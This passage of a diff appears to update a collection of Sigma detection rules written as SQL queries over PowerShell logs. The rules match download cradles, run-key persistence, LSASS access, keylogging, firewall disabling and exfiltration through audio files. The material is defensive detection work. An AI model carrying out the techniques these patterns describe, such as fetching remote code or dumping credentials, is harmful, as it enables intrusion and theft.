'%reg%' ESCAPE '\\' AND ScriptBlockText LIKE '%add%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noprofile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-windowstyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%system.net.webclient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.download%' ESCAPE '\\') OR (ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml" + "filename": "posh_ps_susp_invocation_specific.yml" }, { - "title": "DirectorySearcher Powershell Exploitation", - "id": "1f6399cf-2c80-4924-ace1-6fcff3393480", - "status": "test", - "description": "Enumerates Active Directory to determine computers that are joined to the domain", + "title": "Potential COM Objects Download Cradles Usage - PS Script", + "id": "3c7d1587-3b13-439f-9941-7d14313dbdfe", + "status": "experimental", + "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", "author": "frack113", - "tags": [ - "attack.discovery", - "attack.t1018" - ], "falsepositives": [ - "Unknown" + "Legitimate use of the library" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object %' ESCAPE '\\' AND ScriptBlockText LIKE '%System.DirectoryServices.DirectorySearcher%' ESCAPE '\\' AND ScriptBlockText LIKE '%.PropertiesToLoad.Add%' ESCAPE '\\' AND ScriptBlockText LIKE '%.findall()%' ESCAPE '\\' AND ScriptBlockText LIKE '%Properties.name%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Type]::GetTypeFromCLSID(%' ESCAPE '\\' AND (ScriptBlockText LIKE '%0002DF01-0000-0000-C000-000000000046%' ESCAPE '\\' OR ScriptBlockText LIKE '%F6D90F16-9C73-11D3-B32E-00C04F990BB4%' ESCAPE '\\' OR ScriptBlockText LIKE '%F5078F35-C551-11D3-89B9-0000F81FE221%' ESCAPE '\\' OR ScriptBlockText LIKE '%88d96a0a-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR ScriptBlockText LIKE '%AFBA6B42-5692-48EA-8141-DC517DCF0EF1%' ESCAPE '\\' OR ScriptBlockText LIKE '%AFB40FFD-B609-40A3-9828-F88BBE11E4E3%' ESCAPE '\\' OR ScriptBlockText LIKE '%88d96a0b-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR ScriptBlockText LIKE '%2087c2f4-2cef-4953-a8ab-66779b670495%' ESCAPE '\\' OR ScriptBlockText LIKE '%000209FF-0000-0000-C000-000000000046%' ESCAPE '\\' OR ScriptBlockText LIKE '%00024500-0000-0000-C000-000000000046%' ESCAPE '\\'))" ], - "filename": "posh_ps_directorysearcher.yml" + "filename": "posh_ps_download_com_cradles.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", - "id": "e54f5149-6ba3-49cf-b153-070d24679126", + "title": "Potential PowerShell Obfuscation Using Alias Cmdlets", + "id": "96cd126d-f970-49c4-848a-da3a09f55c55", "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects Set-Alias or New-Alias cmdlet usage. Which can be use as a mean to obfuscate PowerShell scripts", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1027", "attack.execution", + "attack.t1027", "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Set-Alias %' ESCAPE '\\' OR ScriptBlockText LIKE '%New-Alias %' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_var.yml" + "filename": "posh_ps_susp_set_alias.yml" }, { - "title": "Enable Windows Remote Management", - "id": "991a9744-f2f0-44f2-bd33-9092eba17dc3", - "status": "test", - "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", + "title": "Powershell Token Obfuscation - Powershell", + "id": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", + "status": "experimental", + "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.006" + "attack.defense_evasion", + "attack.t1027.009" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Enable-PSRemoting %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR ScriptBlockText REGEXP '\"(\\{\\d\\}){2,}\"\\s*-f' OR ScriptBlockText REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}') AND NOT (((ScriptBlockText LIKE '%it will return true or false instead%' ESCAPE '\\' OR ScriptBlockText LIKE '%The function also prevents `Get-ItemProperty` from failing%' ESCAPE '\\')) OR (Path LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Path LIKE '%\\\\bin\\\\servicecontrol.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%`r`n%' ESCAPE '\\')))" ], - "filename": "posh_ps_enable_psremoting.yml" + "filename": "posh_ps_token_obfuscation.yml" }, { - "title": "Code Executed Via Office Add-in XLL File", - "id": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", - "status": "test", - "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", - "author": "frack113", + "title": "AADInternals PowerShell Cmdlets Execution - PsScript", + "id": "91e69562-2426-42ce-a647-711b8152ced6", + "status": "experimental", + "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", + "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1137.006" + "attack.execution", + "attack.reconnaissance", + "attack.discovery", + "attack.credential_access", + "attack.impact" ], "falsepositives": [ - "Unknown" + "Legitimate use of the library for administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComObject %' ESCAPE '\\' AND ScriptBlockText LIKE '%.application%' ESCAPE '\\' AND ScriptBlockText LIKE '%.RegisterXLL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Join-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Open-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Read-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Restore-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Search-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Send-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Update-AADInt%' ESCAPE '\\'))" ], - "filename": "posh_ps_office_comobject_registerxll.yml" + "filename": "posh_ps_aadinternals_cmdlets_execution.yml" }, { - "title": "Modify Group Policy Settings - ScriptBlockLogging", - "id": "b7216a7d-687e-4c8d-82b1-3080b2ad961f", - "status": "experimental", - "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", + "title": "Powershell Suspicious Win32_PnPEntity", + "id": "b26647de-4feb-4283-af6b-6117661283c5", + "status": "test", + "description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1484.001" + "attack.discovery", + "attack.t1120" ], "falsepositives": [ - "Legitimate use" + "Admin script" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System%' ESCAPE '\\' AND (ScriptBlockText LIKE '%GroupPolicyRefreshTimeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTimeOffsetDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTimeOffset%' ESCAPE '\\' OR ScriptBlockText LIKE '%EnableSmartScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%ShellSmartScreenLevel%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Win32\\_PnPEntity%' ESCAPE '\\')" ], - "filename": "posh_ps_modify_group_policy_settings.yml" + "filename": "posh_ps_susp_win32_pnpentity.yml" }, { - "title": "Registry-Free Process Scope COR_PROFILER", - "id": "23590215-4702-4a70-8805-8dc9e58314a2", + "title": "Replace Desktop Wallpaper by Powershell", + "id": "c5ac6a1e-9407-45f5-a0ce-ca9a0806a287", "status": "test", - "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR.\nThe COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR).\nThese profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.\n(Citation: Microsoft Profiling Mar 2017)\n(Citation: Microsoft COR_PROFILER Feb 2013)\n", + "description": "An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users.\nThis may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper\n", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1574.012" + "attack.impact", + "attack.t1491.001" ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%$env:COR\\_ENABLE\\_PROFILING%' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:COR\\_PROFILER%' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:COR\\_PROFILER\\_PATH%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Get-ItemProperty%' ESCAPE '\\' AND ScriptBlockText LIKE '%Registry::%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKEY\\_CURRENT\\_USER\\\\Control Panel\\\\Desktop\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%WallPaper%' ESCAPE '\\') OR ScriptBlockText LIKE '%SystemParametersInfo(20,0,%,3)%' ESCAPE '\\'))" ], - "filename": "posh_ps_cor_profiler.yml" + "filename": "posh_ps_susp_wallpaper.yml" }, { - "title": "Powershell Timestomp", - "id": "c6438007-e081-42ce-9483-b067fbef33c3", + "title": "Powershell Execute Batch Script", + "id": "b5522a23-82da-44e5-9c8b-e10ed8955f88", "status": "test", - "description": "Adversaries may modify file time attributes to hide new or changes to existing files.\nTimestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.\n", + "description": "Adversaries may abuse the Windows command shell for execution.\nThe Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.\nThe Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.\nCommon uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system\n", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1070.006" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Legitimate admin script" + "Legitimate administration script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%.CreationTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%.LastWriteTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%.LastAccessTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetCreationTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetLastAccessTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetLastWriteTime%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.cmd%' ESCAPE '\\' OR ScriptBlockText LIKE '%.bat%' ESCAPE '\\'))" ], - "filename": "posh_ps_timestomp.yml" + "filename": "posh_ps_susp_execute_batch_script.yml" }, { - "title": "Suspicious Start-Process PassThru", - "id": "0718cd72-f316-4aa2-988f-838ea8533277", + "title": "PowerShell Create Local User", + "id": "243de76f-4725-4f2e-8225-a8a69b15ad61", "status": "test", - "description": "Powershell use PassThru option to start in background", - "author": "frack113", + "description": "Detects creation of a local user via PowerShell", + "author": "@ROxPinTeddy", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.execution", + "attack.t1059.001", + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate user creation" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%-PassThru %' ESCAPE '\\' AND ScriptBlockText LIKE '%-FilePath %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-LocalUser%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_start_process.yml" + "filename": "posh_ps_create_local_user.yml" }, { - "title": "Powershell Trigger Profiles by Add_Content", - "id": "05b3e303-faf0-4f4a-9b30-46cc13e69152", - "status": "test", - "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles.", + "title": "Suspicious Get Local Groups Information - PowerShell", + "id": "fa6a5a45-3ee2-4529-aa14-ee5edc9e29cb", + "status": "experimental", + "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.t1546.013" + "attack.discovery", + "attack.t1069.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\' AND ScriptBlockText LIKE '%$profile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Value%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"\"%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%get-localgroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LocalGroupMember%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Get-WMIObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Group%' ESCAPE '\\')))" ], - "filename": "posh_ps_trigger_profiles.yml" + "filename": "posh_ps_susp_local_group_reco.yml" }, { - "title": "Suspicious PowerShell Mailbox SMTP Forward Rule", - "id": "15b7abbb-8b40-4d01-9ee2-b51994b1d474", + "title": "Windows Firewall Profile Disabled", + "id": "488b44e7-3781-4a71-888d-c95abfacf44d", "status": "experimental", - "description": "Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects when a user disables the Windows Firewall via a Profile to help evade defense.", + "author": "Austin Songer @austinsonger", "tags": [ - "attack.exfiltration" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "Legitimate usage of the cmdlet to forward emails" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -DeliverToMailboxAndForward %' ESCAPE '\\' AND ScriptBlockText LIKE '% -ForwardingSmtpAddress %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-NetFirewallProfile %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Enabled %' ESCAPE '\\' AND ScriptBlockText LIKE '% False%' ESCAPE '\\' AND (ScriptBlockText LIKE '% -All %' ESCAPE '\\' OR ScriptBlockText LIKE '%Public%' ESCAPE '\\' OR ScriptBlockText LIKE '%Domain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Private%' ESCAPE '\\'))" ], - "filename": "posh_ps_exchange_mailbox_smpt_forwarding_rule.yml" + "filename": "posh_ps_windows_firewall_profile_disabled.yml" }, { - "title": "Disable Powershell Command History", - "id": "602f5669-6927-4688-84db-0d4b7afb2150", + "title": "Suspicious PowerShell Get Current User", + "id": "4096a49c-7de4-4da0-a230-c66ccd56ea5a", "status": "experimental", - "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", - "author": "Ali Alwashali", + "description": "Detects the use of PowerShell to identify the current logged user.", + "author": "frack113", + "tags": [ + "attack.discovery", + "attack.t1033" + ], + "falsepositives": [ + "Legitimate PowerShell scripts" + ], + "level": "low", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%[System.Environment]::UserName%' ESCAPE '\\' OR ScriptBlockText LIKE '%$env:UserName%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Security.Principal.WindowsIdentity]::GetCurrent()%' ESCAPE '\\'))" + ], + "filename": "posh_ps_susp_get_current_user.yml" + }, + { + "title": "Potential Keylogger Activity", + "id": "965e2db9-eddb-4cf6-a986-7a967df651e4", + "status": "experimental", + "description": "Detects PowerShell scripts that contains reference to keystroke capturing functions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.003" + "attack.collection", + "attack.credential_access", + "attack.t1056.001" ], "falsepositives": [ - "Legitimate script that disables the command history" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-Module%' ESCAPE '\\' AND ScriptBlockText LIKE '%psreadline%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::%' ESCAPE '\\')" ], - "filename": "posh_ps_disable_psreadline_command_history.yml" + "filename": "posh_ps_susp_keylogger_activity.yml" }, { - "title": "Suspicious Connection to Remote Account", - "id": "1883444f-084b-419b-ac62-e0d0c5b3693f", - "status": "test", - "description": "Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts.\nWithout knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism\n", - "author": "frack113", + "title": "Potential Data Exfiltration Via Audio File", + "id": "e4f93c99-396f-47c8-bb0f-201b1fa69034", + "status": "experimental", + "description": "Detects potential exfiltration attempt via audio file using PowerShell", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1110.001" + "attack.exfiltration" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%System.DirectoryServices.Protocols.LdapDirectoryIdentifier%' ESCAPE '\\' OR ScriptBlockText LIKE '%System.Net.NetworkCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%System.DirectoryServices.Protocols.LdapConnection%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[System.Math]::%' ESCAPE '\\' AND ScriptBlockText LIKE '%[IO.FileMode]::%' ESCAPE '\\' AND ScriptBlockText LIKE '%BinaryWriter%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x52%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x49%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x46%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x57%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x41%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x56%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x45%' ESCAPE '\\' AND ScriptBlockText LIKE '%0xAC%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_networkcredential.yml" + "filename": "posh_ps_audio_exfiltration.yml" }, { - "title": "Powershell WMI Persistence", - "id": "9e07f6e7-83aa-45c6-998e-0af26efd0a85", + "title": "Powershell Trigger Profiles by Add_Content", + "id": "05b3e303-faf0-4f4a-9b30-46cc13e69152", "status": "test", - "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.", + "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles.", "author": "frack113", "tags": [ "attack.privilege_escalation", - "attack.t1546.003" + "attack.t1546.013" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%New-CimInstance %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namespace root/subscription %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName \\_\\_EventFilter %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Property %' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-CimInstance %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namespace root/subscription %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName CommandLineEventConsumer %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Property %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\' AND ScriptBlockText LIKE '%$profile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Value%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"\"%' ESCAPE '\\'))" ], - "filename": "posh_ps_wmi_persistence.yml" + "filename": "posh_ps_trigger_profiles.yml" }, { - "title": "Powershell Keylogging", - "id": "34f90d3c-c297-49e9-b26d-911b05a4866c", - "status": "experimental", - "description": "Adversaries may log user keystrokes to intercept credentials as the user types them.", - "author": "frack113", + "title": "Powershell Add Name Resolution Policy Table Rule", + "id": "4368354e-1797-463c-bc39-a309effbe8d7", + "status": "test", + "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", + "author": "Borna Talebi", "tags": [ - "attack.collection", - "attack.t1056.001" + "attack.impact", + "attack.t1565" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR (ScriptBlockText LIKE '%Get-ProcAddress user32.dll GetAsyncKeyState%' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-ProcAddress user32.dll GetForegroundWindow%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-DnsClientNrptRule%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namesp%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSe%' ESCAPE '\\')" ], - "filename": "posh_ps_keylogging.yml" + "filename": "posh_ps_add_dnsclient_rule.yml" }, { - "title": "SyncAppvPublishingServer Execution to Bypass Powershell Restriction", - "id": "dddfebae-c46f-439c-af7a-fdb6bde90218", + "title": "PowerShell Get-Process LSASS in ScriptBlock", + "id": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", "status": "test", - "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", - "author": "Ensar Şamil, @sblmsrsn, OSCD Community", + "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "App-V clients" + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%SyncAppvPublishingServer.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process lsass%' ESCAPE '\\')" ], - "filename": "posh_ps_syncappvpublishingserver_exe.yml" + "filename": "posh_ps_susp_getprocess_lsass.yml" }, { - "title": "User Discovery And Export Via Get-ADUser Cmdlet - 